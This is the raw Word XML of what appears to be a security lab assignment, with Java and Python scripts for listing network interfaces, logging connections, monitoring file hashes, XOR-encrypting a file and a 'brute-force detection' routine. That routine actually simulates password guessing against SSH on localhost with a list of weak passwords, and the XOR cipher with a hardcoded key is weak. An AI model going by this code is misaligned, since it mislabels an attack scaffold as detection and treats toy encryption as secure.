      </w:pPr>
    </w:p>
    <w:p w14:paraId="25BBA57A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</w:p>
    <w:p w14:paraId="2AC7EE25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>import java.net.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5307DD74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>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC78713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</w:p>
    <w:p w14:paraId="5495DF3C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>public class testcode {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1DA0A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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203671EC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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD3EBA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Enumeration&lt;NetworkInterface&gt; interfaces = NetworkInterface.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>getNetworkInterfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1C5729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while (interfaces.hasMoreElements()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048A7D2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NetworkInterface netIntf = interfaces.nextElement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5AFABC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System.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("Interface: " + netIntf.getDisplayName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5351B0CC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Enumeration&lt;InetAddress&gt; addresses = netIntf.getInetAddresses();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF86C47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while (addresses.hasMoreElements()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785EEEC1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    InetAddress address = addresses.nextElement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA51D4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    System.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.println("  IP Address: " + address.getHostAddress());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A222B9F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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF06B78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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0157CC57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} catch (SocketException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046CEE5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    e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577BDDE4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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC49BC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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA5819E" w14:textId="77777777" w:rsidR="006C66E3" w:rsidRPr="006C66E3" w:rsidRDefault="006C66E3" w:rsidP="006C66E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="659"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C66E3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0460A" w14:textId="77777777" w:rsidR="006C66E3" w:rsidRPr="006C66E3" w:rsidRDefault="006C66E3" w:rsidP="00195426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="659" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EF069B" w14:textId="77777777" w:rsidR="00195426" w:rsidRDefault="00195426" w:rsidP="00195426">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="659" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC80B09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outgoing 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using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5C1482" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="284" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>psutil</w:t>
      </w:r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analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07945224" w14:textId="77777777" w:rsidR="00F1315B" w:rsidRDefault="00F1315B">
      <w:pPr>
        <w:spacing w:line="284" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148BFBC6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>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59468B2F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>import psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02566305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>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47215B3B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>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5CAEA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</w:p>
    <w:p w14:paraId="0A3653BE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>def log_connections(log_file="network_connections.csv"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137669B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# Write CSV header if file doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25682632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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E167F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with open(log_file, mode='w', newline='') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101C0CF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writer = csv.writer(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E814C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writer.writerow(["Timestamp", "PID", "Local Address", "Remote Address", "Status", "Process Name"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2E7A5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except IOError as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D9723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print(f"Error creating log file: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBC64B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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C532E60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</w:p>
    <w:p w14:paraId="6E26C78E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print("Logging network connections. Press Ctrl+C to stop.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C272A4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cycle_count = 0  # To track the number of logging cycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4F8B0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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB53C20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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D05658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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D22B9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cycle_count += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E79C1E4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connections_logged = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40100186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print(f"\n=== Cycle {cycle_count} - {time.strftime('%Y-%m-%d %H:%M:%S')} ===")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411751C7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A9043A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with open(log_file, mode='a', newline='') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D14031C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writer = csv.writer(file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C7FB13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for conn in psutil.net_connections(kind='inet'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7E0B1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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573C981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laddr = f"{conn.laddr.ip}:{conn.laddr.port}" if conn.laddr else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76064695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raddr = f"{conn.raddr.ip}:{conn.raddr.port}" if conn.raddr else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CEB18C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proc_name = psutil.Process(conn.pid).name() if conn.pid else "N/A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397E2598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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37751AFA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# Write to CSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298ABBC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writer.writerow([time.strftime("%Y-%m-%d %H:%M:%S"), conn.pid, laddr, raddr, conn.status, proc_name])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560106A4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00689607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# Print to console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475032DB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print(f"PID: {conn.pid or 'N/A'} | Local: {laddr} | Remote: {raddr} | Status: {conn.status} | Process: {proc_name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABBCAC2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connections_logged += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E5C7A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0E92A7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except (psutil.NoSuchProcess, psutil.AccessDenied):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D04CF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        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E4182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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33D691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if connections_logged == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB574F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print("No active network connections detected in this cycle.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48115B59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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA4384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    print(f"Logged {connections_logged} connections in this cycle.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D0528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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342BA015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    time.sleep(5)  # Log every 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A90339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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED6105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print(f"\nLogging stopped after {cycle_count} cycles.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAFE94F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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56967C80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    print(f"An error occurred: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66331DA1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</w:p>
    <w:p w14:paraId="52048F3D" w14:textId="77777777" w:rsidR="00984A2B" w:rsidRPr="00984A2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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43686611" w14:textId="13F80AA1" w:rsidR="00F1315B" w:rsidRDefault="00984A2B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  <w:r w:rsidRPr="00984A2B">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">    log_connections()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756AE106" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00984A2B">
      <w:pPr>
        <w:spacing w:line="284" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7487F89F" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00984A2B">
      <w:pPr>
        <w:spacing w:line="284" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8BC0ED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line="242" w:lineRule="auto"/>
        <w:ind w:right="987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unauthorized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 network configuration files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/resolv.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982CA51" w14:textId="77777777" w:rsidR="0053138F" w:rsidRDefault="0053138F" w:rsidP="0053138F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="987" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DD711C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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48F905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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85F0F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lastRenderedPageBreak/>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167AC7E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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F544A39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</w:p>
    <w:p w14:paraId="5FB07453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# Use temporary files for testing (will work on any OS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B8BA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FILES_TO_MONITOR = [os.path.join(os.getcwd(), "test1.txt"), os.path.join(os.getcwd(), "test2.txt")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9C7BC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</w:p>
    <w:p w14:paraId="5CD03C01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def get_file_hash(filepath):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9AE1D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD77330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with open(filepath, 'rb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476AD01A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return hashlib.sha256(f.read()).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE6337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except FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF112C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return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746AB91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</w:p>
    <w:p w14:paraId="3D4C25F6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def monitor_files(interval=5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59309A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# Create test files if they don't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA3C71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for f in FILES_TO_MONITOR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD933F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if not os.path.exists(f):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71668358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with open(f, 'w') as temp: temp.write("Test data")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C9AE4C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48305FAB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hashes = {f: get_file_hash(f) for f in FILES_TO_MONITOR}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2F698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print("Monitoring started (Ctrl+C to stop):")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724AE607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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E679F52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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857D240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time.sleep(interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C29A356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print(f"\n[Cycle at {time.strftime('%H:%M:%S')}]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BFC05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for f in FILES_TO_MONITOR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB04D97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new_hash = get_file_hash(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9D8AC6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status = "MISSING" if new_hash is None else "CHANGED" if new_hash != hashes[f] else "UNCHANGED"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E19D93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print(f"File: {os.path.basename(f)} | Status: {status} | Hash: {new_hash or 'N/A'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6713D3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if new_hash: hashes[f] = new_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10707693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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45818E9D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print("\nMonitoring stopped.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1648F321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</w:p>
    <w:p w14:paraId="07A40784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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A1D55" w14:textId="3AC11437" w:rsidR="0053138F" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="987" w:firstLine="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monitor_files()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCFEB20" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRPr="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="987" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55752E1F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41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decrypt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transferring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FTP using PyCryptodome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DB9C65" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="410" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679409F3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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EA058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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A2D7B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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185F9589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</w:p>
    <w:p w14:paraId="25F8780C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def simple_encrypt(data, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48221E9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key_hash = hashlib.sha256(key).digest()  # 32-byte key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFBF2C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return bytes(a ^ b for a, b in zip(data, key_hash * (len(data) // len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D7C0E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</w:p>
    <w:p w14:paraId="37AD1508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def encrypt_file(input_file, output_file, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C959F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print(f"Starting encryption of '{input_file}'...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD4B3B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with open(input_file, 'rb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FECA0C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data = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99F70A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print(f"Input size: {len(data)} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A71BD0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ciphertext = simple_encrypt(data, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2EAF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with open(output_file, 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C7E2A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f.write(ciphertext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60DDD5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print(f"Encrypted to '{output_file}' (size: {len(ciphertext)} bytes).")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B26A5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</w:p>
    <w:p w14:paraId="5C7661DB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def decrypt_file(input_file, output_file, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494E733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print(f"Starting decryption of '{input_file}'...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7664CC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with open(input_file, 'rb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C05B4B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data = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F2725A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print(f"Input size: {len(data)} bytes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D199E11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plaintext = simple_encrypt(data, key)  # XOR is reversible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD1D4EF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with open(output_file, 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE297E3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f.write(plaintext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9A8BF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print(f"Decrypted to '{output_file}' (size: {len(plaintext)} bytes).")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFB739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</w:p>
    <w:p w14:paraId="5C8E374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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EB8D50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key = b"thisisaverysecure"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25990CD5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# Create a sample file if it doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E07E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if not os.path.exists("sample.txt"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D19EBB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with open("sample.txt", "wb") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC32ACD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f.write(b"Hello, this is a test!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704DBD28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encrypt_file("sample.txt", "sample_encrypted.bin", key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F62569" w14:textId="715E9AB1" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="410" w:firstLine="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decrypt_file("sample_encrypted.bin", "sample_decrypted.txt", key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866F275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410" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7735EE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528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brute-force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rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>paramiko</w:t>
      </w:r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z w:val="24"/>
        </w:rPr>
        <w:t>to log failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D83B12" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="528" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF14440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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD42D5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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DBE6CD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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403226E8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</w:p>
    <w:p w14:paraId="5F0B635A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def detect_brute_force_attempts(server_ip, port, username, password_list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF6210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print(f"Starting brute-force detection on {server_ip}:{port} for user '{username}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4491EF02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for i, password in enumerate(password_list, 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AE87C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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45059ED5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with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB3DA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s.settimeout(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68F533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print(f"Attempt {i}/{len(password_list)}: Trying password '{password}'...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649394F2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s.connect((server_ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5E59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print(f"Success! '{password}' worked (simulated).")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F051431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    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E462D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except socket.timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B066B5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print(f"Timeout: '{password}' failed to connect.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E612C1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        except ConnectionRefusedError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E5050F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print(f"Refused: '{password}' failed (connection rejected).")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFEBB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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102881A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    print(f"Error with '{password}': {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292BFEE6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time.sleep(1)  # Simulate delay between attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE92E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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B6571F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    print("All passwords failed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E392ABB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</w:p>
    <w:p w14:paraId="72294C6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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565110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server_ip = "127.0.0.1"  # Localhost for testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A9B34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port = 22  # SSH port (won’t work unless SSH server is running locally)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630B7B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username = "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604A633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password_list = ["password123", "admin123", "letmein", "123456"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68B2C7" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRPr="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="528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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA9B0F" w14:textId="2A9F5FF3" w:rsidR="00AF79EE" w:rsidRPr="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="528" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF79EE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    detect_brute_force_attempts(server_ip, port, username, password_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163AA769" w14:textId="77777777" w:rsidR="00AF79EE" w:rsidRDefault="00AF79EE" w:rsidP="00AF79EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:right="528" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775C96B1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00AF79EE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39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Security Manager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
